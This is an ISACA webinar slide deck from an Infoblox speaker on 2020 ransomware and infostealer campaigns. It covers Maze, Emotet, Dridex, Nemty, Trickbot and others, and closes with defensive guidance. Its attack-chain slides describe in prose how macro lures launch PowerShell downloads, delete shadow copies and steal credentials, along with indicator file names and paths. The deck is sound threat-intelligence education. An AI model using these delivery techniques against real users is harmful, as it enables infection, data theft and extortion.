STOPPING RANSOMWARE & ADVANCED

MALWARE THREATS:
THE CURRENT SCOPE OF THESE THREATS
AND TOOLS TO SHUT THEM DOWN
MICHAEL ZUCKERMAN, PRODUCT MANAGEMENT, INFOBLOX
WEBINAR INFORMATION & QUICK TIPS

• The Presentation Deck can be downloaded from the MATERIALS window.

• Windows can be hidden or expanded to fit your preference.

• Submit questions in the Q&A window.

• Use the HELP icon at the bottom for FAQ’s and system requirements.

• Please click on the ISACA Customer Experience Center image to be

redirected to ISACA’s customer support page.
CPE CERTIFICATE & CREDIT

LIVE EVENT & ON DEMAND RECORDING

• You must view the live or recorded webinar for the required amount of time (50
minutes). We encourage you to stay on and watch the entire webinar.

• Check the CPE Credit and Certificate window to view the timer.

• Your CPE Certificate will automatically appear in the ISACA CPE RECORDS tab
on the MyISACA page in your account after completing the required viewing time.

• Please be patient. This process could take up to 24 hours for your CPE Certificate
to appear in your account and another 24 hours for your CPE Credit to be applied
to your CPE Manager.
TODAY’S SPEAKER

Michael Zuckerman

Product Management

Infoblox
AGENDA

• State of the Ransomware Union 2020 • The Great Coronavirus Deception!

• The Emergence of Targeted Ransomware
• Anatomy of an Attack
– City of Pensacola, Florida Hit by Maze
Ransomware for $1,000,000 Disaster
• The Escalating Cost of an Attack
• Ransomware-as-a-Service
• A Close Look @ Ransomware Variants
• Best Practices - IT & the SOC
KEY TAKEAWAYS:
• The State of Ransomware & Other Malware
Variants
• How Ransomware Variants Differ
• Defensive Tactics That Work
• Nemty Ransomware Loves You
• SWIFT-Themed Campaigns
• Ursnif Banking Trojan
• Emotet Stole Christmas
• Dridex Banking Trojan
• Dreambot Banking Trojan
• Rig Exploit Kit Drops Predator The Thief &
CrySIS
• Maze Ransomware
• PsiXBot InfoStealer Uses DNS
STATE OF THE RANSOMWARE UNION

The Good
• The number of ransomware incidents in
2018 decreased substantially

The Bad
• Enterprise focused ransomware attacks are
up 12% in 2019.
• The pace continues to grow as
ransomware attacks in healthcare grew
350% in Q4 2019.

The Ugly
• These targeted ransomware attacks are the
most dangerous and most sophisticated.
TARGETED RANSOMWARE GOES AFTER THE ENTERPRISE

• SamSam was one of the most

early forms of targeted
ransomware
• Ryuk started in 2018
• Many others arriving on the scene
continually
TARGETED RANSOMWARE IS POUNDING U.S. ENTERPRISE

• The U.S. has been hardest hit as

the SamSam group has been
targeting the U.S. market for some
time

• The U.K., Turkey, Australia and

Canada follow
ONE VERTICAL EXAMPLE: THE TARGETED RANSOMWARE
ASSAULT ON CITIES

In 2019, targeted ransomware attacks hit at multiple cities in the United States and
selected international targets

• City of Pensacola, Florida • Cleveland, Ohio - Hopkins Intl Airport

• Johannesburg, South Africa - Electric Utility • Augusta, Maine
• Lake City, Florida • Tallahassee, Tennessee
• Riviera Beach, Florida • Albany, New York
• City of Baltimore, Maryland • Jackson County, Georgia
ANATOMY OF AN ATTACK: RANSOMWARE ATTACK HITS CITY OF
PENSACOLA, FLA.
• In December 2019, the City of Pensacola, Florida was
infected by Maze ransomware and held hostage for
$1,000,000

• Nearly all of the city hall’s computer communication

systems were down, as well as online payment
systems for Pensacola Energy and the city’s sanitation
department.

• The city’s IT department had to take down many of

their systems as a precaution.

• BleepingComputer confirmed that they were attacked

by the Maze Ransomware who stated they stole data
from the city before encrypting the network and then
promptly demanded $1,000,000.

• Pensacola City hired Deloitte for $140,000 to evaluate

the extent of a cyberattack.
THE HIGH COST OF EXTORTION
Riviera Beach City, Florida
• The City of Riviera Beach City, Florida paid
$600,000 to regain access to files
encrypted during a ransomware attack
Lake City, Florida
• The City of Lake City, Florida paid
$500,000 to regain access to encrypted
files
City of Pensacola, Florida
• $1,000,000 ransom demanded – now
what???
EXTORTION
A person obtains property from another
using coercion (e.g., threats of future
physical injury, property damage, or
exposure to criminal charges or public
humiliation) or an implicit or explicit
threat to give the payer worse than fair
treatment.
There is a clear offender (the person
using coercion) and the victim (the
threatened person) who is intimidated
into turning over property to the
offender.
THE HIGH COSTS OF RECOVERY

Atlanta, Georgia - City Government

• Atlanta, Georgia was hit with SamSam and it
appears now that it might cost the city $17
million to recover - this figure is unverified by
the City

Colorado Department of Transportation

• A ransomware attack against Colorado’s
Department of Transportation might end-up
costing about $2 million to remediate.

Baltimore, Maryland - City Government

• Baltimore, Maryland was hit with ransomware
and Baltimore’s budget office estimated that
the ransomware attack may cost over $18
million
RANSOMWARE AS A SERVICE (RAAS) A BIG BUSINESS FOR
ORGANIZED CRIME
Ransomware as a Service (RaaS)
• Just like any SaaS business you want to
reduce investment, run the latest
software, and get good support

• Outsource R&D to software developers

for 15% of the ransom you gather

• Your (criminal) partner builds the

ransomware, hosts it in the cloud, and
gives you a configurable and easily
deployable toolset
A CLOSE LOOK AT RANSOMWARE VARIANTS

• The Great Coronavirus Deception

• Nemty Ransomware Loves You

• SWIFT-Themed Campaigns

• Ursnif Banking Trojan

• Emotet Stole Christmas

• Dridex Banking Trojan

• Dreambot Banking Trojan

• Rig Exploit Kit Drops Predator The

Thief & CrySIS

• Maze Ransomware

• PsiXBot InfoStealer Uses DNS

FORMBOOK CORONAVIRUS CAMPAIGNS

Overview
• From 24 March through 2 April, Infoblox
observed several malicious spam (malspam)
campaigns delivering Formbook malware.
• The campaigns are connected by a
Coronavirus or COVID-19-related theme in their
subject lines or file attachment names.

Customer Impact Campaign Analysis

• Formbook is an information stealer • All of the campaigns we
(infostealer) that is sold as a service to threat observed used a Coronavirus
actors. Its capabilities include process theme or were related to a
hollowing, clipboard monitoring, keylogging, campaign that did.
webform hijacking, screenshotting,
downloading additional payloads, and
communicating with a C&C server.
FORMBOOK CORONAVIRUS CAMPAIGNS

Attack Chain

• Once the recipient opens (and if

necessary, decompresses) the attached

ATTACK CHAIN
file, the malware performs process
hollowing and injects itself into the
Microsoft File Explorer process.

• Next, a portable executable (either

doc.exe or RFQ-QUOTAION-31-03-
2020.exe) launches the Formbook
payload (nbtstat.exe or mstsc.exe). The
malware then proceeds to steal victim
credentials and information and uses
firefox.exe to create new files with the
stolen information.
TRICKBOT WHO? CORONAVIRUS RIDES AGAIN

Overview
• From 21 to 24 March, Infoblox observed
another malicious spam (malspam) email
campaign that used a fraudulent Coronavirus
alert from the World Health Organization
(WHO) to deliver Trickbot banking malware.

Customer Impact Campaign Analysis

• Trickbot is a modular banking trojan that • The Trickbot campaign that Infoblox
targets customers of major banks. Once observed used a Coronavirus theme to
Trickbot infects a victim, it will attempt to steal lure recipients into opening a malicious
sensitive financial information and exfiltrate Microsoft Word document.
that data to a command and control (C2)
server. Trickbot also attempts to move laterally
across vulnerable networks.
TRICKBOT WHO? CORONAVIRUS RIDES AGAIN

Attack Chain
• When the recipient opens the malicious Word
document and enables macros, the macros

ATTACK CHAIN
within the document create a new directory,
C:\netstats, and generate two files within it.

• The first, PressTableList.jse, is a Microsoft

JScript file containing the malicious payload.

• The second is a basic Windows command

(CMD) file, PressTableList.cmd, that is used
to execute the malicious JScript. Once these
files are created, the macro executes the
CMD file, which executes the JScript file.
NEW AGENT TESLA INFOSTEALER CAMPAIGNS USE
CORONAVIRUS
Overview
• Since 16 March, we observed a series of
campaigns using COVID-19 or Coronavirus-
themed spam emails to distribute the Agent
Tesla information stealer (infostealer).
• But wait! There’s more!

Customer Impact Campaign Analysis

• Agent Tesla is an easy-to-use, readily
available keylogger that can capture and store
keystrokes, steal credentials and information
from forms, and exfiltrate data to a command
and control (C2) server.
• While all of the campaigns we initially
observed used a Coronavirus theme in
the email subjects, pivoting on one of
the sender hostnames allowed us to
find several additional campaigns.
• So many email variants … so little time!
NEW AGENT TESLA INFOSTEALER CAMPAIGNS USE
CORONAVIRUS
Attack Chain

• As with previous Agent Tesla campaigns,

once the recipient opened the attachment

ATTACK CHAIN
and decompressed the archive file, the
executable inside launched the malware,
gathered victim information, and then
reached out to send the data to an FTP or
SMTP server.

• Some of the recent samples also reached

out to Google Drive before attempting to
exfiltrate the victim’s data to an FTP or
SMTP server.
SPOOFED CORONAVIRUS MAP DELIVERS AZORULT
INFOSTEALER
Overview
• On 9 March, Reason Security reported on a
malicious campaign that used a weaponized
Coronavirus map to deliver the AZORult
information stealer (infostealer).

Customer Impact Campaign Analysis

• AZORult is an infostealer that can steal a
victim’s credentials, Bitcoin wallets, chat logs,
and files.
• It can also take screenshots of the infected
system and transmit them to the attacker.
• The primary lure in this campaign was a
Coronavirus map that was a repurposed
version of the legitimate Coronavirus
dashboard produced by Johns Hopkins
University. How low can you go? ! !!
SPOOFED CORONAVIRUS MAP DELIVERS AZORULT
INFOSTEALER
Attack Chain
• When the victim downloads and runs the
malicious executable, it creates and runs

ATTACK CHAIN
two additional executables.

• The first, Corona-virus-Map.com.exe, is a

benign Coronavirus dashboard that the
threat actors plagiarized from John
Hopkins University. This file is essentially
a decoy to convince the victim that the
application is legitimate.

• The second executable, Corona.exe, is an

AZORult unpacker that contains an
embedded Windows batch file and a
password-protected archive.
LOKIBOT RIDES CORONAVIRUS

Overview
• During the first week of March, LokiBot
infostealer joined the list of malware being
distributed by threat actor(s) taking advantage
of the fear and interest in the spread of
Coronavirus (COVID-19).

Customer Impact Campaign Analysis

• LokiBot has become a popular information
stealer that collects credentials and security
tokens from infected machines.
• LokiBot targets multiple applications, including
but not limited to Mozilla Firefox, Google
Chrome, Thunderbird, as well as FTP.
• Threat actors behind LokiBot regularly
use attachments that are archived files,
notably RAR, TAR, and GZ file types.
• In previous Lokibot campaigns, we have
seen threat actors use LZH and ISO files
as well for their attachments.
LOKIBOT RIDES CORONAVIRUS

Attack Chain

• Once the recipient opens the attached

archive file and clicks on the executable, it

ATTACK CHAIN
reaches out to a Google Drive and
downloads a file matching the naming
pattern from February’s campaign.

• The malware then steals the victim’s

information and sends it to a command and
control (C2) server.
NEMTY RANSOMWARE LOVES YOU

Overview
• Nemty ransomware made its first attempt to
target English-speaking victims with a malspam
campaign
• Nemty only recently started using malspam as a
distribution method,
• Nemty malspam campaigns have been restricted
to targets in the Asia-Pacific region (APAC).

Customer Impact Campaign Analysis

• Nemty is a ransomware that finds & deletes • The campaign in this report used a classic
shadow copies of files before it encrypts them, “secret admirer” lure reminiscent of the
making it difficult for users to restore files ILOVEYOU worm of 2000.
without payment.
• The threat actors behind Nemty announced
their intention to begin leaking the confidential
data of victims who refuse to pay their ransom.
NEMTY RANSOMWARE LOVES YOU

Attack Chain
• When the victim extracts and executes the
malicious JavaScript file contained within

ATTACK CHAIN
the ZIP file attachment, it
• launches a PowerShell command that
retrieves and executes the Nemty
ransomware payload from a remote
server.
• Nemty uses the Windows vssadmin
command to delete any existing shadow
copies of files to prevent the victim from
easily restoring them
• Nemty uses the taskkill command to stop
processes and services that may prevent
it from successfully encrypting files.
SWIFT-THEMED CAMPAIGNS

Overview
• Malspam leverages themes referencing SWIFT
payments network.
• The malspam campaigns were delivering several
malware families, including Agent Tesla
keylogger, Lokibot infostealer, and more.
• The TTP’s appear similar to activity conducted by
the threat actor SWEED as reported by Talos in
2019.
Customer Impact Campaign Analysis
• Agent Tesla can capture and store keystrokes, • All the emails we discovered used the
steal credentials, and exfiltrate data to a acronym “SWIFT” either in the subject line
command and control (C2) server, potentially or the attachment’s file name.
via email messages to a remote mail server.
SWIFT-THEMED CAMPAIGNS

Attack Chain

• The attack chains varied somewhat

ATTACK CHAIN
across the campaigns, but all required
the recipient to open an attached file
that was often compressed.

• Many of the samples reached out to

Google Drives and downloaded files
that matched the following pattern: [a-
zA-Z]{3,}_encrypted_[0-9A-
Z]{7}\[1\].bin.
URSNIF BANKING TROJAN

Overview
• Between 23 and 24 January, security researcher
Brad Duncan reported two separate malicious
spam campaigns that used compressed
Microsoft Word documents with malicious macros
to deliver Ursnif malware.

Customer Impact
• Ursnif is a variant of the Gozi banking trojan
Campaign Analysis
that can steal credentials, cryptocurrency • The Ursnif campaign sent messages that
wallets, and email information. Upon infection, appeared to be replies to existing email
Ursnif injects its code into the Internet Explorer chains and asked the recipient(s) to open
(IE) browser, then uses IE to manage an attached ZIP file with a specific
communications with its command and control password.
(C2), including follow-on downloads.
URSNIF BANKING TROJAN

Attack Chain
HOW EMOTET STOLE CHRISTMAS

Overview
• Leading up to 25 December, Infoblox observed
an email campaign themed around both
Christmas and Swedish environmental activist
Greta Thunberg to lure recipients into opening
Microsoft Word documents with malicious macros
that infected victims with the Emotet information
stealer.

Customer Impact Campaign Analysis

• Emotet is an information stealer and trojan
downloader that targets businesses through
email.
• Once Emotet infects a victim’s device, it steals
various sensitive credentials and
communicates with its command and control
(C2) server to receive further instructions.
• The campaign that Infoblox observed
used emails whose subject lines often
varied but always included Greta
Thunberg’s name. Most of these subject
lines also included the phrase “Time
Person of the Year 2019.”
HOW EMOTET STOLE CHRISTMAS

Attack Chain
When the recipient opens the malicious Word
document and enables macros, the macros

ATTACK CHAIN
decode and execute a Powershell command
that downloads the Emotet payload from a
compromised website, and then executes it:
• Upon execution, Emotet attempts to
spread laterally across the victim’s
network to infect additional devices while
stealing sensitive information from all
infected devices.
• Throughout the infection process Emotet
contacts its C2 servers to transmit stolen
credentials, receive new instructions, and
retrieve additional malware payloads.
DRIDEX BANKING TROJAN

Overview
• In December we observed a malicious email
campaign distributing Dridex banking trojan. Like
our first Dridex report in June, the emails had
password-protected Microsoft Office document
attachments that used macros with hardcoded
URLs to download and execute Dridex payloads.

Customer Impact Campaign Analysis

• Dridex is a banking trojan that was first
discovered in 2011 and became one of the
most distributed of its kind by 2015.
• Dridex operators have historically targeted the
financial services sector, including both
financial institutions and their customers.
• In the campaign we observed, the
malicious emails mimicked an automated
payroll notification from Automatic Data
Processing, Inc. (ADP), an American
provider of human resource management
software.
DRIDEX BANKING TROJAN

Attack Chain

• Victims who opened the attached

OpenXML files in this campaign were

ATTACK CHAIN
prompted to enter a 3 to 4-digit
password found in the body of the email.

• When victims entered the password and

enabled document macros, the file
executed a PowerShell command to
download the Dridex payload from an
external website.

• The command used a VBScript named

visitcard.vbs to write the Dridex payload
to c:\Colorfonts32\secpi15.exe.
DREAMBOT BANKING TROJAN

Overview
• On 7 November, we observed two email
campaigns distributing the banking trojan
Dreambot, which is a variant of Ursnif.
• Threat actors have distributed Dreambot since
2016, targeting financial customers in Australia,
Italy, Switzerland, the U.K., the U.S., Poland, and
Canada

Customer Impact Campaign Analysis

• Dreambot extends Ursnif’s functionality with
the ability to communicate over Tor.
• Dreambot targets financial institutions’
customers to steal authentication information.
• Dreambot can log keystrokes, inject into web
pages, steal web form and email data, and
screenshots.
• In the campaigns we observed, the emails
are written in Czech or Slovenian and
reference the user’s financial information.
• Threat actors distribute Dreambot through
email attachments or emails containing a
link to a file.
DREAMBOT BANKING TROJAN

Attack Chain
• When the email recipient opens the DOCX
attachment, Microsoft Office downloads

ATTACK CHAIN
the externally linked template.
• Office then applies the template and opens
the DOCX file.
• This triggers the VBA code in the template.
• The VBA code runs PowerShell
commands to download and execute
Dreambot using Regsvr32.exe.
• The malware injects itself into Explorer.exe
and runs CMD.exe commands to profile
the user’s computer.
• Dreambot then sends this information to its
command and control (C2) server.
RIG EXPLOIT KIT DROPS INFOSTEALER & CRYSIS RANSOMWARE

Overview
• On 17 November, Broad Analysis
reported a campaign that used Rig
exploit kit to distribute an infostealer
known as Predator The Thief, followed
by a variant of CrySIS ransomware.

Customer Impact Campaign Analysis

• Rig is an exploit kit (EK)
• Predator The Thief is an infostealer used to
harvest login credentials, cryptocurrency
wallets, and more.
• CrySIS is a ransomware that extorts victims by
encrypting files on their system a demanding a
fee to decrypt them.
• The campaign reported by Broad Analysis
used malvertisements placed on
legitimate websites to redirect vulnerable
users to malicious websites containing the
Rig exploit kit.
• This in turn was used to deliver Predator
The Thief and CrySIS.
RIG EXPLOIT KIT DROPS INFOSTEALER AND RANSOMWARE

Attack Chain
MAZE RANSOMWARE

Overview
• On 29 October, we detected a campaign distributing
Maze ransomware (a variant of ChaCha ransomware)
to Italian-speaking users.
• The emails appeared to be from the Italian Revenue
Agency and instructed users to open an attached
Microsoft Word document with “financial guidelines.”

Customer Impact Campaign Analysis

• Maze ransomware uses 2048-bit RSA and the
ChaCha20 stream cipher to encrypt individual
files and seems to append different extensions.
• Then the user's desktop wallpaper to displays a
message about the encrypted files and the file
name of the dropped ransom note.
• The emails we saw were sent by one of
two email accounts designed to appear
from an official Italian govt. agency.
• Both email domains were actor controlled
and registered with PublicDomainRegistry
on 25 October.
MAZE RANSOMWARE

Attack Chain
Each Word document was embedded with a
macro that downloaded Maze ransomware

ATTACK CHAIN
from the actor-controlled server.
• The macro then wrote the ransomware
payload to
C:\Windows\Temp\wordupd.tmp and
executed it.
• After Maze encrypted the victim’s files, it
made HTTP POST requests to several IP-
based URLs that began with the first octet
91. Only a few of these requests returned
a 200-response code, indicating a
successful connection.
PsiXBot INFOSTEALER USES DNS OVER HTTPS

Overview
• On 11 December, Malware Traffic Analysis reported
on a campaign in which a threat actor was delivering
PsiXBot via the Spelevo exploit kit (EK).
• PsiXBot steals information, adds computers to its
botnet and uses DNS over HTTPS (DoH).

Customer Impact Campaign Analysis

• PsiXBot uses Google’s DoH service to encrypt
and hide within normal HTTPS traffic.
• This circumvents DNS firewalls since the
queries to the threat actor domains are not on
port 53.
• The threat actor uses fast flux to prevent the C2
IP from blocking.
• The campaign reported by Malware Traffic
Analysis used malvertisements placed on
legitimate websites to redirect the user’s
browser to the malicious domain hosting
the Spelevo EK.
PsiXBot INFOSTEALER USES DNS OVER HTTPS

Attack Chain
VULNERABILITIES & MITIGATION

Common Themes Centered Around User Interaction!

• Lokibot • Emotet Stole Christmas

• Nemty Loves You • Dridex Banking Trojan
• SWIFT Email • Dreambot Banking Trojan
• Ursnif Banking Trojan • Rig Exploit Kit

Let's Not Forget the RDP Attack Vector - in our Last Report

• Cryptomix: RDP • Change the default RDP port

Server Attacker numbers
• Eliminate default credentials
• Add 2 factor authentication
for RDP login.
GUIDANCE: FOR YOUR USERS

• NEVER EVER ENABLE MACROS.

• Be cautious of archive files, especially if the

file size is unusually small (.zip .rar .gz .sitx
.7z)

• Be aware of the attachment’s file type, and

NEVER OPEN .vbs, .cmd, or .bat

• DON’T OPEN vague emails.

• BE SUSPICIOUS OF unexpected emails,

especially when they pertain to financial
documents.

• Be aware of PHISHING and how to handle it

appropriately.

• You are being SOCIALLY ENGINEERED

even now!
BEST PRACTICES - IT & SOC TEAMS
• User education!
• Assess threat intelligence
and your environment.
• Leverage threat
intelligence with
foundational security
wrapped around DNS.
• Install the latest security
patches.
• Install the latest firmware
updates.
• Limit the number of users
who can access remote
desktops.
• Enable network level
authentication (NLA).
• Require strong passwords
from users.
• Backup data and systems
regularly and store data
offsite and off the network.
• Install email security
solutions.
• Place RDP servers behind
firewalls.
THREAT INTELLIGENCE DATA BRINGS COMPELLING VALUE

• Threat intelligence data is a game

changer!

• You need to understand for your industry,

business size, and geography the most
likely attackers and the tactics,
techniques, and procedures they may
use.

• The digital transformation has all but

eliminated the traditional perimeter model
as a viable defense. You are wide open
even now.

• Threat intelligence give you the tools you

need to fight (and win)!
ABOUT INFOBLOX

Infoblox delivers the next-level network experience with its Secure Cloud-
Managed Network Services.
As a pioneer in providing the world’s most reliable, secure, and automated
networks, we are relentless in our pursuit of next-level network simplicity.
A recognized industry leader, Infoblox has 50 percent market share comprised of
8,000 customers, including 350 of the Fortune 500.

To learn more please visit our website via www.infoblox.com.

QUESTIONS?
This training content (“content”) is provided to you without warranty, “as is” and “with
all faults”. ISACA makes no representations or warranties express or implied, including
those of merchantability, fitness for a particular purpose or performance, and non-
infringement, all of which are hereby expressly disclaimed.

You assume the entire risk for the use of the content and acknowledge that: ISACA
has designed the content primarily as an educational resource for IT professionals and
therefore the content should not be deemed either to set forth all appropriate
procedures, tests, or controls or to suggest that other procedures, tests, or controls
that are not included may not be appropriate; ISACA does not claim that use of the
content will assure a successful outcome and you are responsible for applying
professional judgement to the specific circumstances presented to determining the
appropriate procedures, tests, or controls.

Copyright © 2020 by the Information Systems Audit and Control Association, Inc. (ISACA). All rights reserved. This webinar may not be used, copied, reproduced,
modified, distributed, displayed, stored in a retrieval system, or transmitted in any form by any means (electronic, mechanical, photocopying, recording or otherwise).
THANK YOU FOR
ATTENDING THIS
ISACA WEBINAR